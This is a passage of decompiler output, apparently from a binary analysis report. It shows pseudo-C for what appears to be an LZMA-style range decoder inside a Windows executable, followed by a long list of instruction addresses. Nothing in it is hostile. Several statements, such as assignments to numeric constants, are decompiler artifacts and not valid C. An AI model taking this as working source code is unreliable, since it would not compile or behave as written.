											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                    0x00406566
                                                                                                    0x00406566
                                                                                                    0x00406566
                                                                                                    0x00406566
                                                                                                    0x0040656c
                                                                                                    0x00406570
                                                                                                    0x00406574
                                                                                                    0x0040657e
                                                                                                    0x0040658c
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00406899
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040689f
                                                                                                    0x004068a8
                                                                                                    0x004068ae
                                                                                                    0x004068b1
                                                                                                    0x004068b4
                                                                                                    0x004068b7
                                                                                                    0x004068ba
                                                                                                    0x004068c0
                                                                                                    0x004068d9
                                                                                                    0x004068dc
                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068f6
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406896
                                                                                                    0x00406899
                                                                                                    0x0040689d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x004068f8
                                                                                                    0x00406871
                                                                                                    0x00406875
                                                                                                    0x004069ad
                                                                                                    0x004069ad
                                                                                                    0x004069b7
                                                                                                    0x004069bf
                                                                                                    0x004069c6
                                                                                                    0x004069c8
                                                                                                    0x004069cf
                                                                                                    0x004069d3
                                                                                                    0x004069d3
                                                                                                    0x0040687b
                                                                                                    0x00406881
                                                                                                    0x00406888
                                                                                                    0x00406890
                                                                                                    0x00406890
                                                                                                    0x00406893
                                                                                                    0x00000000
                                                                                                    0x00406893
                                                                                                    0x004068fd
                                                                                                    0x0040690a
                                                                                                    0x0040690d
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fb5
                                                                                                    0x00405fbe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x00405fc4
                                                                                                    0x00000000
                                                                                                    0x00405fcb
                                                                                                    0x00405fcf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fd5
                                                                                                    0x00405fd8
                                                                                                    0x00405fdb
                                                                                                    0x00405fde
                                                                                                    0x00405fe2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fe8
                                                                                                    0x00405fe8
                                                                                                    0x00405feb
                                                                                                    0x00405fed
                                                                                                    0x00405fee
                                                                                                    0x00405ff1
                                                                                                    0x00405ff3
                                                                                                    0x00405ff4
                                                                                                    0x00405ff6
                                                                                                    0x00405ff9
                                                                                                    0x00405ffe
                                                                                                    0x00406003
                                                                                                    0x0040600c
                                                                                                    0x0040601f
                                                                                                    0x00406022
                                                                                                    0x0040602e
                                                                                                    0x00406056
                                                                                                    0x00406058
                                                                                                    0x00406066
                                                                                                    0x00406066
                                                                                                    0x0040606a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x0040605a
                                                                                                    0x0040605d
                                                                                                    0x0040605e
                                                                                                    0x0040605e
                                                                                                    0x00000000
                                                                                                    0x0040605a
                                                                                                    0x00406030
                                                                                                    0x00406034
                                                                                                    0x00406039
                                                                                                    0x00406039
                                                                                                    0x00406042
                                                                                                    0x0040604a
                                                                                                    0x0040604d
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406053
                                                                                                    0x00000000
                                                                                                    0x00406070
                                                                                                    0x00406070
                                                                                                    0x00406074
                                                                                                    0x00406920
                                                                                                    0x00406920
                                                                                                    0x00000000
                                                                                                    0x00406920
                                                                                                    0x0040607a
                                                                                                    0x0040607d
                                                                                                    0x0040608d
                                                                                                    0x00406090
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406093
                                                                                                    0x00406096
                                                                                                    0x0040609a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040609c
                                                                                                    0x0040609c
                                                                                                    0x004060a2
                                                                                                    0x004060cc
                                                                                                    0x004060d2
                                                                                                    0x004060d9
                                                                                                    0x00000000
                                                                                                    0x004060d9
                                                                                                    0x004060a4
                                                                                                    0x004060a8
                                                                                                    0x004060ab
                                                                                                    0x004060b0
                                                                                                    0x004060b0
                                                                                                    0x004060bb
                                                                                                    0x004060c3
                                                                                                    0x004060c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040610b
                                                                                                    0x00406111
                                                                                                    0x00406114
                                                                                                    0x00406121
                                                                                                    0x00406129
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004060e0
                                                                                                    0x004060e0
                                                                                                    0x004060e4
                                                                                                    0x0040692f
                                                                                                    0x0040692f
                                                                                                    0x00000000
                                                                                                    0x0040692f
                                                                                                    0x004060ea
                                                                                                    0x004060f0
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fb
                                                                                                    0x004060fe
                                                                                                    0x00406101
                                                                                                    0x00406104
                                                                                                    0x00406109
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067a0
                                                                                                    0x004067a0
                                                                                                    0x004067a6
                                                                                                    0x004067ac
                                                                                                    0x004067b2
                                                                                                    0x004067cc
                                                                                                    0x004067cf
                                                                                                    0x004067d5
                                                                                                    0x004067e0
                                                                                                    0x004067e0
                                                                                                    0x004067e2
                                                                                                    0x004067b4
                                                                                                    0x004067b4
                                                                                                    0x004067c3
                                                                                                    0x004067c7
                                                                                                    0x004067c7
                                                                                                    0x004067ec
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004067ee
                                                                                                    0x004067f2
                                                                                                    0x004069a1
                                                                                                    0x004069a1
                                                                                                    0x00000000
                                                                                                    0x004069a1
                                                                                                    0x004067f8
                                                                                                    0x004067fe
                                                                                                    0x00406805
                                                                                                    0x0040680d
                                                                                                    0x00406810
                                                                                                    0x00406813
                                                                                                    0x00406813
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406131
                                                                                                    0x00406131
                                                                                                    0x00406133
                                                                                                    0x00406136
                                                                                                    0x004061a7
                                                                                                    0x004061a7
                                                                                                    0x004061aa
                                                                                                    0x004061ad
                                                                                                    0x004061b4
                                                                                                    0x004061be
                                                                                                    0x00000000
                                                                                                    0x004061be
                                                                                                    0x00406138
                                                                                                    0x00406138
                                                                                                    0x0040613c
                                                                                                    0x0040613f
                                                                                                    0x00406141
                                                                                                    0x00406144
                                                                                                    0x00406147
                                                                                                    0x00406149
                                                                                                    0x0040614c
                                                                                                    0x0040614e
                                                                                                    0x00406153
                                                                                                    0x00406156
                                                                                                    0x00406159
                                                                                                    0x0040615d
                                                                                                    0x00406164
                                                                                                    0x00406167
                                                                                                    0x0040616e
                                                                                                    0x00406172
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x0040617a
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406174
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x00406169
                                                                                                    0x0040617e
                                                                                                    0x00406181
                                                                                                    0x0040619f
                                                                                                    0x0040619f
                                                                                                    0x004061a1
                                                                                                    0x00000000
                                                                                                    0x00406183
                                                                                                    0x00406183
                                                                                                    0x00406183
                                                                                                    0x00406186
                                                                                                    0x00406189
                                                                                                    0x0040618c
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x0040618e
                                                                                                    0x00406191
                                                                                                    0x00406194
                                                                                                    0x00406196
                                                                                                    0x00406197
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x0040619a
                                                                                                    0x00000000
                                                                                                    0x004063d0
                                                                                                    0x004063d0
                                                                                                    0x004063d4
                                                                                                    0x004063f2
                                                                                                    0x004063f2
                                                                                                    0x004063f5
                                                                                                    0x004063fc
                                                                                                    0x004063ff
                                                                                                    0x00406402
                                                                                                    0x00406405
                                                                                                    0x00406408
                                                                                                    0x0040640b
                                                                                                    0x0040640d
                                                                                                    0x00406414
                                                                                                    0x00406415
                                                                                                    0x00406417
                                                                                                    0x0040641a
                                                                                                    0x0040641d
                                                                                                    0x00406420
                                                                                                    0x00406420
                                                                                                    0x00406425
                                                                                                    0x00000000
                                                                                                    0x00406425
                                                                                                    0x004063d6
                                                                                                    0x004063d6
                                                                                                    0x004063d9
                                                                                                    0x004063dc
                                                                                                    0x004063e6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040643a
                                                                                                    0x0040643a
                                                                                                    0x0040643e
                                                                                                    0x00406461
                                                                                                    0x00406464
                                                                                                    0x00406467
                                                                                                    0x00406471
                                                                                                    0x00406440
                                                                                                    0x00406440
                                                                                                    0x00406443
                                                                                                    0x00406446
                                                                                                    0x00406449
                                                                                                    0x00406456
                                                                                                    0x00406459
                                                                                                    0x00406459
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040647d
                                                                                                    0x0040647d
                                                                                                    0x00406481
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406487
                                                                                                    0x00406487
                                                                                                    0x0040648b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406491
                                                                                                    0x00406491
                                                                                                    0x00406493
                                                                                                    0x00406497
                                                                                                    0x00406497
                                                                                                    0x0040649a
                                                                                                    0x0040649e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064ee
                                                                                                    0x004064ee
                                                                                                    0x004064f2
                                                                                                    0x004064f9
                                                                                                    0x004064f9
                                                                                                    0x004064fc
                                                                                                    0x004064ff
                                                                                                    0x00406509
                                                                                                    0x00000000
                                                                                                    0x00406509
                                                                                                    0x004064f4
                                                                                                    0x004064f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406515
                                                                                                    0x00406515
                                                                                                    0x00406519
                                                                                                    0x00406520
                                                                                                    0x00406523
                                                                                                    0x00406526
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x0040651b
                                                                                                    0x00406529
                                                                                                    0x0040652c
                                                                                                    0x0040652f
                                                                                                    0x0040652f
                                                                                                    0x00406532
